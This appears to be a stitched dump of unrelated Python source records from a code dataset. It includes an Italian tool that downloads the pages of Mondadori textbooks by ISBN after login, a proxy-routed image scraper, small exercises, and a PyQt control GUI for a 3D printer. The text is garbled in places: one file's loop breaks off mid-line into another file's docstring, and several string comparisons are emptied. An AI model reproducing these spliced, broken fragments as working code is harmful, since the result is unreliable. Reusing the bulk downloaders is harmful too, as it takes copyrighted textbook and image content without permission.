html:\n\t\tlogbox.insert(Tkinter.END, \"Login fallito\")\n\t\tisbn_entry.configure(state='normal')\n\t\tstart_button.configure(state='normal')\n\t\treturn\n\n\tlogbox.insert(Tkinter.END, \"Recupero informazioni\")\n\tsession.get(\"http://libropiuweb.mondadorieducation.it/mod_connect/login?urlRitorno=http%3A%2F%2Flibropiuweb.mondadorieducation.it%2F\")\n\tusername = re.search('\"username\":\"(.*?)\"',html).group(1)\n\thtml=session.get(\"http://iflipit.mondadorieducation.it/desktop/index.php?accesslevel=st-pl&usr=\"+username+\"&iss=\"+isbn+\"&fil=iss\").text\n\ttry:\n\t\tnpages = int(re.search('\"pagesCount\":(.*?),',html).group(1))\n\texcept:\n\t\ttkMessageBox.showerror(\"Errore\", \"ISBN non valido o non disponibile\", icon='error')\n\t\tlogbox.insert(Tkinter.END, \"ISBN non valido o non disponibile\")\n\t\tisbn_entry.configure(state='normal')\n\t\tstart_button.configure(state='normal')\n\t\treturn\n\n\tlogbox.insert(Tkinter.END, \"Inizio scaricamento delle pagine\")\n\n\tpdf_data = {}\n\n\tpagen=1\n\tsignal = 1\n\twhile signal:\n\t\tfor i in range(10-threading.activeCount()):\n\t\t\tif pagen2->5\", \"1->3\"]\n\nExplanation: All root-to-leaf paths are: 1->2->5, 1->3\n\"\"\"\n\nfrom binarytree import build\n\ndef binaryTreePaths(root):\n if root == None:\n return None\n paths = list()\n # get the\n if root.left:\n paths.extend(binaryTreePaths(root.left))\n if root.right:\n paths.extend(binaryTreePaths(root.right))\n l = len(paths)\n # check if this node is a leaf\n if l == 0:\n return [str(root.value)]\n else:\n # for each path string, add the value of this node to the start point\n for i in range(l):\n paths[i] = str(root.value) + \"->\" + paths[i]\n return paths\n\nroot1 = build([1, 2, 3, None, 5])\nprint(root1)\nprint(binaryTreePaths(root1))\n","sub_path":"LeetCode-Python/257 Binary Tree Paths.py","file_name":"257 Binary Tree Paths.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542124322","text":"from cx_Freeze import setup,Executable\r\nimport modules\r\n\r\nincludefiles = ['settings.ini', 'runwithconsole.bat']\r\nincludes = modules.main\r\nexcludes = []\r\npackages = []\r\n\r\ntarget = Executable(\r\n script=\"schedulemaker.py\",\r\n icon=\"icon.ico\"\r\n )\r\n\r\n\r\nsetup(\r\n name = 'schedulemaker',\r\n version = '0.3',\r\n description = 'Trello Schedule Generator',\r\n author = 'Patrick Schmitt',\r\n author_email = '',\r\n options = {'build_exe': {'includes':includes,'excludes':excludes,'packages':packages,'include_files':includefiles}}, \r\n executables = [target]\r\n)\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219024136","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: C8381-Tommy \n\nfibonacci number\n Fn = Fn-1 + Fn-2 \n F0 = 0 and F1 = 1.\n \"\"\" \n \nfib=[]\n\ndef fibonacci(n):\n a,b =0,1\n \n while a<=n:\n print(a,end = \" \")\n a,b = b,a+b\n \nprint(fibonacci(55))\n\ndef fibonacci(n):\n a=1\n b=1\n if n==1:\n print('0')\n elif n==2:\n print('0','1')\n else:\n print(\"fibonacci: \", end=' ')\n print('0',a,b,end=' ')\n for i in range(n-3):\n toplam = a + b\n b=a\n a= toplam\n print(toplam,end=' ')\n print()\n return b\n \nfibonacci(11)","sub_path":"python/try/fibonacci ass_5.py","file_name":"fibonacci ass_5.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"104618645","text":"class Valid_FLAGS(object):\r\n # run test use\r\n test_img_directory = '/home/lzhpc/home/gu/test_b'\r\n test_data_file = '/home/lzhpc/home/gu/test_b/test.csv'\r\n processed_testimg_directory = './preprocess/processed_b'\r\n model_load_dir = './logs_and_weights_add_occlusion_and_fpn'\r\n normalize_img = True\r\n total_num_joints = 24\r\n\r\n total_joints_list = ['neckline_left', 'neckline_right', 'center_front', 'shoulder_left', 'shoulder_right',\r\n 'armpit_left', 'armpit_right', 'waistline_left', 'waistline_right', 'cuff_left_in',\r\n 'cuff_left_out', 'cuff_right_in', 'cuff_right_out', 'top_hem_left', 'top_hem_right',\r\n 'waistband_left', 'waistband_right', 'hemline_left', 'hemline_right', 'crotch',\r\n 'bottom_left_in', 'bottom_left_out', 'bottom_right_in', 'bottom_right_out']\r\n\r\n total_joints_index = ['0-neckline_left', '1-neckline_right', '2-center_front', '3-shoulder_left',\r\n '4-shoulder_right',\r\n '5-armpit_left', '6-armpit_right', '7-waistline_left', '8-waistline_right', '9-cuff_left_in',\r\n '10-cuff_left_out', '11-cuff_right_in', '12-cuff_right_out', '13-top_hem_left',\r\n '14-top_hem_right',\r\n '15-waistband_left', '16-waistband_right', '17-hemline_left', '18-hemline_right', '19-crotch',\r\n '20-bottom_left_in', '21-bottom_left_out', '22-bottom_right_in', '23-bottom_right_out']\r\n\r\n blouse_num_joints = 13\r\n blouse_joints_list = ['neckline_left', 'neckline_right', 'shoulder_left', 'shoulder_right', 'center_front',\r\n 'armpit_left', 'armpit_right', 'top_hem_left', 'top_hem_right', 'cuff_left_in',\r\n 'cuff_left_out', 'cuff_right_in', 'cuff_right_out']\r\n blouse_index = [0, 1, 3, 4, 2,\r\n 5, 6, 13, 14, 9,\r\n 10, 11, 12]\r\n\r\n dress_num_joints = 15\r\n dress_joints_list = ['neckline_left', 'neckline_right', 'shoulder_left', 'shoulder_right', 'center_front',\r\n 'armpit_left', 'armpit_right', 'waistline_left', 'waistline_right', 'cuff_left_in',\r\n 'cuff_left_out', 'cuff_right_in', 'cuff_right_out', 'hemline_left', 'hemline_right']\r\n dress_index = [0, 1, 3, 4, 2,\r\n 5, 6, 7, 8, 9,\r\n 10, 11, 12, 17, 18]\r\n\r\n outwear_num_joints = 14\r\n outwear_joints_list = ['neckline_left', 'neckline_right', 'shoulder_left', 'shoulder_right', 'armpit_left',\r\n 'armpit_right', 'waistline_left', 'waistline_right', 'cuff_left_in', 'cuff_left_out',\r\n 'cuff_right_in', 'cuff_right_out', 'top_hem_left', 'top_hem_right']\r\n outwear_index = [0, 1, 3, 4, 5,\r\n 6, 7, 8, 9, 10,\r\n 11, 12, 13, 14]\r\n\r\n skirt_num_joints = 4\r\n skirt_joints_list = ['waistband_left', 'waistband_right', 'hemline_left', 'hemline_right']\r\n skirt_index = [15, 16, 17, 18]\r\n\r\n trousers_num_joints = 7\r\n trousers_joints_list = ['waistband_left', 'waistband_right', 'crotch', 'bottom_left_in', 'bottom_left_out',\r\n 'bottom_right_in', 'bottom_right_out']\r\n trousers_index = [15, 16, 19, 20, 21,\r\n 22, 23]\r\n\r\n","sub_path":"Test/normal _test/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"324732501","text":"import os\nimport requests\nfrom lxml import etree\n\nclass MeiSpider(object):\n\n def img_downloader(self,bin,image):\n if not os.path.exists(\"./meizi\"):\n os.mkdir(\"./meizi\")\n filename = image[-20:].replace(\"/\",\"\")\n with open(\"./meizi/\"+filename,\"wb\") as f:\n f.write(bin)\n print(filename,\"完成写入...\")\n\n\n def get_every_image_url(self,image_list):\n headers = {\n \"host\": \"mm.chinasareview.com\",\n \"connection\": \"keep-alive\",\n \"cache-control\": \"max-age=0\",\n \"upgrade-insecure-requests\": \"1\",\n \"user-agent\": \"mozilla/5.0 (windowS NT 10.0; win64; x64) appLewEbkit/537.36 (KHTML, likE gecko) chrome/67.0.3396.99 safari/537.36\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"accept-language\": \"zH-Cn,zh;q=0.9\",\n \"cookie\": \"__jsluid=029e04bcb09ecce884fcd9c7a7fda77d\",\n \"if-none-match\": \"f67cd360b83ed31:108f\",\n \"if-modified-since\": \"fri, 06 oct 2017 15:32:54 GMT\",\n }\n proxies = {\n \"220.191.14.205\": \"6666\",\n \"122.142.232.17\": \"80\",\n \"123.157.206.160\": \"80\",\n \"118.190.95.26\": \"9001\"\n }\n for image in image_list:\n try:\n res = requests.get(image,timeout=60,headers=headers,proxies=proxies)\n except:\n pass\n else:\n print(res.url)\n bin = res.content\n self.img_downloader(bin, image)\n\n\n\n def inner_page_handler(self,link_image):\n res = requests.get(link_image)\n # print(res.url)\n html = res.text\n html = etree.HTML(html)\n image_list = html.xpath('//div[@id=\"picture\"]//img/@src')\n self.get_every_image_url(image_list)\n\n def img_page_handler(self,html):\n html = etree.HTML(html)\n link_image_list = html.xpath('//ul[@class=\"wp-list clearfix\"]/li//h3/a/@href')\n for link_image in link_image_list:\n self.inner_page_handler(link_image)\n\n\n\n def per_page_handler(self,per_page_url):\n res = requests.get(per_page_url)\n # print(res.url)\n html = res.text\n self.img_page_handler(html)\n\n\n def start(self):\n # url = \"http://www.meizitu.com/tag/banluo_5_1.html\"\n page = 4\n url = \"http://www.meizitu.com/tag/quanluo_4_\"\n for pagenum in range(1, page + 1):\n per_page_url= url + str(pagenum) + \".html\"\n # print(per_page_url)\n self.per_page_handler(per_page_url)\n\n\nif __name__ == \"__main__\":\n MeiSpider().start()\n","sub_path":"0705/test01_爬取妹子图图片.py","file_name":"test01_爬取妹子图图片.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"248152765","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nimport sys\r\nfrom PyQt5.QtGui import QPixmap, QColor, QImage\r\n# from Image_Converter import Image_Converter\r\n# from visualization import visualization as vis\r\n# from Ui_MainWindow import Ui_MainWindow\r\n#from subfolder.visualization import visualization as vis\r\n\r\n\r\nfrom subfolder.Ui_MainWindow import Ui_MainWindow\r\nfrom subfolder.Serial_test import Serial_test as Serial\r\nfrom subfolder.Image_Converter import Image_Converter\r\n\r\nimport matplotlib\r\nfrom matplotlib import pyplot as plt\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport subprocess\r\n\r\nimport matplotlib.animation as manimation\r\n#import seaborn as sns\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport mpl_toolkits.mplot3d as M3\r\nimport mpl_toolkits.mplot3d.art3d as art3d\r\n\r\n\r\n#from Serial_test import Serial_test as Serial\r\nimport serial.tools.list_ports\r\nimport threading\r\nfrom functools import partial\r\nimport time\r\n\r\n#import OpenGL.GL as gl\r\n#import OpenGL.GLU as glu\r\n#import OpenGL.GLUT as glut\r\n#import os\r\n\r\nmatplotlib.use('Qt5Agg')\r\n\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.path import Path\r\nimport matplotlib.patches as patches\r\n\r\n# image_converter = Image_Converter() \r\n# image_converter.openfile(r'C:\\Users\\Jimmy\\Desktop\\3D Printing research\\Silcers\\Slic3r\\STL SAMPLES\\spheresmaller5x.svg') \r\n# image_to_send = image_converter.getlayer(10)\r\n\r\nclass Main_PROGRAM(QtWidgets.QMainWindow):\r\n \r\n def __init__(self):\r\n super().__init__() \r\n self.ui = Ui_MainWindow()\r\n self.MainWindow = QtWidgets.QMainWindow()\r\n self.ui.setupUi(self.MainWindow)\r\n \r\n \r\n #self.ui.show()\r\n \r\n self.image_converter = Image_Converter()\r\n \r\n \r\n self.display_layer_counter =0\r\n self.model_layers = []\r\n \r\n self.serial = Serial()\r\n self.connection = 0\r\n \r\n # \" for manual commands\r\n self.statx =0\r\n self.staty =0\r\n \r\n self.done_data = False\r\n self.link_ui()\r\n self.MainWindow.show()\r\n \r\n self.timer = QtCore.QTimer(parent=self)\r\n self.timer.setInterval(1)\r\n self.timer.timeout.connect(self.check_connection)\r\n self.timer.start()\r\n self.tt =0\r\n \r\n \r\n \r\n def link_ui(self):\r\n \r\n #self.ui.verticalSlider.setRange(0,len(self.model_layers)-1) #changed\r\n # self.ui.verticalSlider.valueChanged['int'].connect(self.disp_layers)\r\n #self.display_curr_layer(len(self.model_layers),self.display_layer_counter)\r\n # self.ui.verticalSlider.setEnabled(False)\r\n self.ui.slicer.clicked.connect(self.openSlic3r)\r\n \r\n self.ui.print.clicked.connect(partial(self.send_commands,\"print\"))\r\n \r\n self.ui.cancelprint.clicked.connect(partial(self.send_commands,\"cancel\"))\r\n \r\n self.ui.pauseprint.clicked.connect(partial(self.send_commands,\"pause\"))\r\n \r\n self.ui.homebutton.clicked.connect(partial(self.send_commands,\"home\"))\r\n self.ui.testprinthead.clicked.connect(partial(self.send_commands,\"test_printhead\"))\r\n self.ui.movenegx.clicked.connect(partial(self.set_statusX,-1))\r\n self.ui.stopx.clicked.connect(partial(self.set_statusX,0))\r\n self.ui.moveposx.clicked.connect(partial(self.set_statusX,1))\r\n self.ui.movenegy.clicked.connect(partial(self.set_statusY,-1))\r\n self.ui.stopy.clicked.connect(partial(self.set_statusY,0))\r\n self.ui.moveposy.clicked.connect(partial(self.set_statusY,1))\r\n \r\n self.ui.opensvg.clicked.connect(self.openFileNameDialog)\r\n self.ui.layernumb.valueChanged.connect(self.layervalue)\r\n self.ui.uploaddata.clicked.connect(self.upload_data)\r\n \r\n self.ui.print.setEnabled(False)\r\n self.ui.pauseprint.setEnabled(True)\r\n self.ui.cancelprint.setEnabled(True)\r\n self.ui.moveposx.setEnabled(True)\r\n self.ui.testprinthead.setEnabled(True)\r\n self.ui.homebutton.setEnabled(True)\r\n # sns.set()\r\n # fig = plt.figure(figsize=(8.82,5.55),dpi =100,frameon=False) #8,5\r\n# ax = fig.add_subplot(111,projection ='3d')\r\n# t = np.linspace(0, 500, 501)\r\n# ax.set_xlim([0, 150])\r\n# ax.set_ylim([0, 150]) #2125\r\n# # ax.imshow(image_to_send) \r\n# # fig.tight_layout()\r\n# ax.view_init(elev=90, azim=90)\r\n# ax.plot(t, np.tan(t), \".\")\r\n \r\n \r\n# self.ui.LAYER_VIEW2D = FigureCanvas(fig)\r\n# self.ui.LAYER_VIEW2D.figure.canvas.draw()\r\n# self.ui.LAYER_VIEW2D.repaint()\r\n \r\n self._canvas = FigureCanvas(Figure(figsize=(8.7,5.3),dpi =100)) #resolution 3d 8.82,5.55\r\n \r\n #self.ax = self._canvas.figure.add_subplot(111,projection ='3d')\r\n self.ax = self._canvas.figure.add_subplot(111)\r\n t = np.linspace(10, 500, 501)\r\n \r\n# x, y = np.ogrid[0:image_to_send.shape[0], 0:image_to_send.shape[1]]\r\n# ax.plot(image_to_send[:,1],image_to_send[:,0])\r\n# xplot = np.where(image_to_send[:,0] == 1)[0]\r\n# yplot = np.where(image_to_send[:,1] == 1)[0]\r\n# ax.plot(xplot,yplot)\r\n # print(image_to_send[:,0])\r\n# verts = [\r\n# (0., 0.), # left, bottom\r\n# (0., 1.), # left, top\r\n# (1., 1.), # right, top\r\n# (1., 0.), # right, bottom\r\n# (0., 0.), # ignored\r\n# ]\r\n#\r\n# codes = [Path.MOVETO,\r\n# Path.LINETO,\r\n# Path.LINETO,\r\n# Path.LINETO,\r\n# Path.CLOSEPOLY,\r\n# ]\r\n# \r\n# path = Path(image_to_send)\r\n# patch = patches.PathPatch(path)\r\n# ax.add_patch(patch)\r\n self.ax.set_xlim([0, 512]) #2125\r\n self.ax.set_ylim([0, 472]) #2125\r\n # self.ax.set_zlim([0,30])\r\n major_ticks = np.arange(0, 513, 100)\r\n minor_ticks = np.arange(0, 513, 5)\r\n\r\n self.ax.set_xticks(major_ticks)\r\n self.ax.set_xticks(minor_ticks, minor=True)\r\n self.ax.set_yticks(major_ticks)\r\n self.ax.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n self.ax.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n self.ax.grid(which='minor', alpha=0.2)\r\n self.ax.grid(which='major', alpha=0.5)\r\n #ax.set_zlim([0, 0])\r\n \r\n \r\n # ax.imshow(image_to_send,origin='upper', aspect='auto') \r\n \r\n # fig.tight_layout()\r\n #ax.view_init(elev=-90, azim=-90)\r\n # ax.plot(t, np.tan(t), \".\")\r\n #self._canvas.setFixedSize(800, 490)\r\n #self.ui.LAYER_VIEW2D.setFixedSize(800, 490)\r\n# self._canvas.setSizePolicy(QtWidgets.QSizePolicy.Expanding,\r\n# QtWidgets.QSizePolicy.Expanding)\r\n# self._canvas.updateGeometry()\r\n \r\n #self._canvas.resize(800, 490)\r\n self._canvas.figure.tight_layout()\r\n # print(image_converter.img_getWidth())\r\n# self._canvas2,self.ax2 = vis.create_fig(\"3d\",image_converter.img_getheight(),image_converter.img_getWidth())\r\n# self._canvas2,self.ax2 = vis.draw3d(fig,ax,image_converter.get_model_layers())\r\n bedsizeX = self.ui.bedXaxis.value()\r\n bedsizeY = self.ui.bedYaxis.value()\r\n self._canvas2,self.ax2 = self.create_fig(\"3d\",bedsizeX,bedsizeY)\r\n self._canvas2.setParent(self.ui.view3d)\r\n self._canvas2.draw()\r\n self._canvas1,self.ax1 = self.create_fig(\"2d\",bedsizeX,bedsizeY)\r\n self._canvas1.setParent(self.ui.LAYER_VIEW2D)\r\n self._canvas1.draw()\r\n # self._canvas1.move(-50,-30)\r\n# self._canvas.setParent(self.ui.view3d)\r\n# self._canvas.draw()\r\n #self._canvas.setParent(self.ui.view3d) # was self.ui.LAYER_VIEW2D\r\n # self._canvas.move(-50,-50) #MOVES THE FIGURE 3d\r\n # self._canvas.move(-50,-30) # was -20,-30\r\n# self.ui.LAYER_VIEW2D.setSizePolicy(QtWidgets.QSizePolicy.Expanding,\r\n# QtWidgets.QSizePolicy.Expanding)\r\n # self.ui.LAYER_VIEW2D.updateGeometry()\r\n # self._canvas.setFocusPolicy(QtCore.Qt.StrongFocus)\r\n \r\n # layer_data = image_converter.getlayer_data(10)\r\n \r\n \r\n \r\n # zs = np.linspace(0,2,0.1)\r\n # print(zs)\r\n # for j in range(0,19):\r\n # layer_data = image_converter.getlayer_data(j)\r\n # for i in range(0,len(layer_data)):\r\n \r\n # path = Path(layer_data[i])\r\n # patch = patches.PathPatch(path)\r\n # self.ax.add_patch(patch)\r\n # art3d.pathpatch_2d_to_3d(patch, z=j, zdir='z')\r\n# coll = matplotlib.collections.PatchCollection(patchesx)\r\n# M3.art3d.patch_collection_2d_to_3d(coll, zs, zdir='z')\r\n# self.ax.add_collection(coll)\r\n# self.ax.show()\r\n #self.ax.add_patch(patch)\r\n self.count =5\r\n self.ui.manualON.clicked.connect(self.image_draw) \r\n #ax.imshow(image_to_send[0:i,0:j],origin='upper', aspect='auto')\r\n self._canvas.draw()\r\n # time.sleep(1)\r\n \r\n# dynamic_ax = dynamic_canvas.figure.subplots()\r\n# \r\n# dynamic_ax.plot(t, np.tan(t), \".\")\r\n# \r\n# \r\n# dynamic_canvas.draw()\r\n \r\n # to do clean code , write a write parameter function , test for multiple model loading , off button encoding , set figures and draw3d 2d right\r\n def update_parameters(self,clicked): #clicked to update =1 , first time clicked =0\r\n #self.dpiX = self.ui.Xdpi.value()\r\n #self.dpiY = self.ui.Ydpi.value()\r\n self.CalibX = self.ui.bedXorigin.value()\r\n self.CalibY = self.ui.bedYorigin.value()\r\n self.BedsizeX = self.ui.bedXaxis.value()\r\n self.BedsizeY = self.ui.bedYaxis.value()\r\n self.jetFreq = self.ui.jet_freq.value()\r\n self.motorXResln = self.ui.xmotionresln.value()\r\n self.motorYResln = self.ui.ymotionresln.value()\r\n \r\n def layervalue(self):\r\n self.ui.layernum.setText(\"layer \" +str(self.ui.layernumb.value()) + \"/\" + str(self.image_converter.get_model_layers_numb()))\r\n if self.ui.tab2dview.currentIndex() !=self.ui.tab2dview.indexOf(self.ui.view2d) :\r\n self.ui.tab2dview.setCurrentIndex(self.ui.tab2dview.indexOf(self.ui.view2d))\r\n \r\n def set_statusX(self,statx):\r\n self.statx = statx\r\n self.send_commands(\"MMOV\")\r\n def set_statusY(self,staty):\r\n self.staty = staty\r\n self.send_commands(\"MMOV\")\r\n \r\n def send_commands(self,name):\r\n if self.serial.check_connectn():\r\n if name == \"print\":\r\n \r\n self.serial.ser_write(\"START\")\r\n \r\n \r\n if name == \"cancel\":\r\n self.serial.ser_write(\"CANCEL\")\r\n if name == \"home\":\r\n self.serial.ser_write(\"HOME\")\r\n if name == \"pause\":\r\n self.serial.ser_write(\"PAUSE\")\r\n if name == \"MMOV\":\r\n \r\n to_send = \"MMOV,\" + str(self.statx) +\",\"+ str(self.staty)\r\n self.serial.ser_write(to_send)\r\n \r\n if name ==\"test_printhead\":\r\n self.serial.ser_write(\"TEST\")\r\n else:\r\n self.ui.textBrowser.append('Printer is not connected')\r\n \r\n \r\n def checkmsg(self,msg):\r\n print(\"msg her:\" + msg)\r\n if msg == \"\":\r\n self.ui.process.setText(\"Homing\")\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Printing Started\")\r\n self.ui.print.setEnabled(False)\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Process Paused\")\r\n self.ui.print.setText(\"PRINT/CONTINUE\")\r\n self.ui.print.setEnabled(True)\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Process Cancelled\")\r\n self.ui.print.setText(\"PRINT\")\r\n self.ui.print.setEnabled(True)\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Manual Motion Control\")\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Printhead Test\")\r\n \r\n def close_connection(self):\r\n self.serial.disconnect()\r\n \r\n \r\n def check_connection(self):\r\n #print(\"check\")\r\n \r\n if self.serial.connect()== True and self.connection !=1:\r\n self.ui.textBrowser.append('Printer is connected')\r\n self.ui.connectionstatus.setText(\"Connected\")\r\n self.connection = 1\r\n \r\n #return True\r\n# \r\n else:\r\n if self.serial.connect() == False and self.connection != 2:\r\n self.ui.textBrowser.append('Printer is disconnected')\r\n self.ui.connectionstatus.setText(\"Disconnected\")\r\n self.connection = 2\r\n \r\n #return False\r\n if self.serial.connect() ==3 and self.connection !=3:\r\n self.connection =3\r\n self.ui.textBrowser.append('\"Connection could not be established, please reconnect device and restart program\"')\r\n if self.serial.check_connectn() == True: \r\n msg = self.serial.ser_read()\r\n \r\n if(msg):\r\n self.checkmsg(msg)\r\n \r\n def arduino_upload(self):\r\n \r\n arduino_ports = [\r\n p.device\r\n for p in serial.tools.list_ports.comports()\r\n if 'Arduino' in p.description\r\n ]\r\n arduinoProg = \"\\\"C:\\\\Program Files (x86)\\\\Arduino\\\\arduino\\\"\"\r\n \r\n actionLine = \"upload \"\r\n \r\n boardLine = \"arduino:avr:mega\"\r\n portLine = arduino_ports[0]\r\n projectFile2 = \"\\\"\\\\firmware\\\\firmware.ino\\\"\"\r\n arduinoCommand = arduinoProg + \" --board \" + boardLine + \" --port \" + portLine + \" --\" + actionLine + projectFile2\r\n print(\"\\n\\n -- Arduino Command --\")\r\n print(arduinoCommand)\r\n \r\n print(\"-- Starting %s --\\n\")\r\n \r\n presult = subprocess.call(arduinoCommand, shell=True)\r\n \r\n if presult != 0:\r\n #print(\"\\n Failed - result code = %s --\" %(presult))\r\n return False\r\n else:\r\n #print(\"\\n-- Success --\")\r\n return True\r\n def done_upload(self):\r\n self.ui.textBrowser.append('Done uploading')\r\n \r\n self.connection =0\r\n #self.timer = QtCore.QTimer(parent=self)\r\n self.timer.timeout.disconnect(self.done_upload)\r\n self.timer.setInterval(1)\r\n self.timer.timeout.connect(self.check_connection)\r\n self.timer.start()\r\n self.done_data = True\r\n self.ui.print.setEnabled(True)\r\n# if self.tt.isAlive():\r\n# print(\"ALIVE\")\r\n# self.tt.join()\r\n def upload_data(self):\r\n if( self.serial.check_connectn()== True and self.image_converter.get_model_layers_numb() >0): #self.serial.connect()== True and\r\n image_numb = self.ui.layernumb.value()\r\n self.ui.layernumb.setEnabled(False)\r\n \r\n self.ui.textBrowser.append('Uploading data...please wait')\r\n image_to_send = self.image_converter.getlayer(image_numb)\r\n self.serial.write_layerdata(image_to_send)\r\n print(\"done writing\")\r\n self.timer.stop()\r\n self.serial.disconnect()\r\n if(self.arduino_upload() == True):\r\n \r\n self.timer.setInterval(30000)\r\n self.timer.timeout.connect(self.done_upload)\r\n self.timer.start()\r\n# self.tt = threading.Timer(30,self.done_upload)\r\n# self.tt.daemon = True\r\n# self.tt.start()\r\n else:\r\n self.ui.textBrowser.append('Upload failed')\r\n else:\r\n if(self.serial.check_connectn()== False):\r\n self.ui.textBrowser.append('Printer is not connected')\r\n if(not self.image_converter.get_model_layers_numb() ):\r\n self.ui.textBrowser.append('No Data')\r\n #self.done_upload()\r\n def image_draw(self):\r\n \r\n self.ax.imshow(image_to_send[0:self.count,0:self.count],origin='upper', aspect='auto')\r\n self._canvas.draw()\r\n self.count = self.count +5\r\n \r\n def openFileNameDialog(self):\r\n options = QFileDialog.Options()\r\n #options |= QFileDialog.DontUseNativeDialog\r\n fileName, _ = QFileDialog.getOpenFileName(self,\"Select Silc3r SVG File\", r'C:\\Users\\Jimmy\\Desktop\\3D Printing research\\Silcers\\Slic3r\\STL SAMPLES',\"SVG Files (*.svg);;All Files (*)\", options=options)\r\n if fileName:\r\n self.ui.textBrowser.append('Model Found & processed')\r\n #print(fileName)\r\n self.done_data = False\r\n self.ui.print.setEnabled(False)\r\n modelname = fileName.split(\"/\")[-1]\r\n modelname = modelname.split(\".\")[0]\r\n self.ui.modelname.setText(modelname)\r\n #return fileName\r\n self.model_layers =[]\r\n self.image_converter.openfile(fileName)\r\n self.model_layers = self.image_converter.get_model_layers()\r\n layer_numbers = self.image_converter.get_model_layers_numb()\r\n #self.ui.verticalSlider.setEnabled(True)\r\n self.ui.layernumb.setEnabled(True)\r\n # self.ui.verticalSlider.setRange(0,layer_numbers)\r\n self.ui.layernumb.setMaximum(layer_numbers)\r\n \r\n self.ax2 = self.draw3d(self.ax2,layer_numbers)\r\n self.ax1 = self.draw2d(self.ax1,0)\r\n self._canvas1.draw()\r\n self._canvas2.draw()\r\n #self.ui.verticalSlider.valueChanged['int'].connect(partial(self.draw2d,self.ax1,self.ui.verticalSlider.value()))\r\n # self.ui.verticalSlider.valueChanged['int'].connect(self.update_2d )\r\n self.ui.layernumb.valueChanged.connect(self.update_2d)\r\n #self.ui.verticalSlider.valueChanged['int'].connect(self.ui.layernumb.setValue(self.ui.verticalSlider.value()))\r\n #self.ui.verticalSlider.setEnabled(True)\r\n # self.disp_layers(0)\r\n def Printer_disconnected(self):\r\n #disconnect printer\r\n # code to be written here to disconnect printer\r\n #\r\n self.ui.label_3.setText(\"Disconnected\")\r\n self.ui.textBrowser.append('Printer is Disconnected')\r\n #self.ui.textBrowser.setText('Printer is Disconnected')\r\n \r\n def openSlic3r(self):\r\n #self.MainWindow.setEnabled(False)\r\n #subprocess.call(['C:\\Program Files\\Repetier-Host\\Slic3r\\Slic3r.exe'])\r\n process =subprocess.Popen('C:\\Program Files\\Repetier-Host\\Slic3r\\Slic3r.exe', shell=False)\r\n \r\n #self.MainWindow.setEnabled(True)\r\n# def tabSelected(self, arg=0):\r\n# print(arg)\r\n# if(arg ==0):\r\n# self.draw()\r\n \r\n \r\n def update_2d(self):\r\n layer_value = self.ui.layernumb.value()\r\n print(layer_value)\r\n \r\n self.ax1 = self.draw2d(self.ax1,layer_value)\r\n \r\n self._canvas1.draw()\r\n #self.ui.layernumb.setValue(layer_value)\r\n \r\n \r\n \r\n \r\n \r\n def create_fig(self,proj,xlim,ylim):\r\n #sns.set()\r\n plt.style.use('seaborn')\r\n self._canvas = FigureCanvas(Figure(figsize=(8.7,5.3),dpi =100))\r\n \r\n if(proj == \"2d\"):\r\n self.ax = self._canvas.figure.add_subplot(111)\r\n \r\n self.ax.set_xlim([0, xlim]) #2125\r\n self.ax.set_ylim([0, ylim]) #2125\r\n # self.ax.set_zlim([0,30])\r\n major_ticks = np.arange(0, xlim, 100)\r\n minor_ticks = np.arange(0, ylim, 5)\r\n\r\n self.ax.set_xticks(major_ticks)\r\n self.ax.set_xticks(minor_ticks, minor=True)\r\n self.ax.set_yticks(major_ticks)\r\n self.ax.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n self.ax.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n self.ax.grid(which='minor', alpha=0.2)\r\n self.ax.grid(which='major', alpha=0.5)\r\n self._canvas.figure.tight_layout()\r\n self._canvas.move(-45,-30)\r\n return self._canvas,self.ax\r\n \r\n if(proj == \"3d\"):\r\n self.ax = self._canvas.figure.add_subplot(111,projection ='3d')\r\n self.ax.set_xlim([0, xlim]) #2125\r\n self.ax.set_ylim([0, ylim]) #2125\r\n self.ax.set_zlim([0,30])\r\n major_ticks = np.arange(0, xlim, 100)\r\n minor_ticks = np.arange(0, ylim, 5)\r\n\r\n self.ax.set_xticks(major_ticks)\r\n self.ax.set_xticks(minor_ticks, minor=True)\r\n self.ax.set_yticks(major_ticks)\r\n self.ax.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n self.ax.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n self.ax.grid(which='minor', alpha=0.2)\r\n self.ax.grid(which='major', alpha=0.5)\r\n self._canvas.figure.tight_layout()\r\n self._canvas.move(-50,-30)\r\n return self._canvas,self.ax\r\n \r\n def draw3d(self,axes,layers):\r\n axes.clear()\r\n for j in range(0,layers):\r\n layer_data = self.image_converter.getlayer_data(j)\r\n for i in range(0,len(layer_data)):\r\n \r\n path = 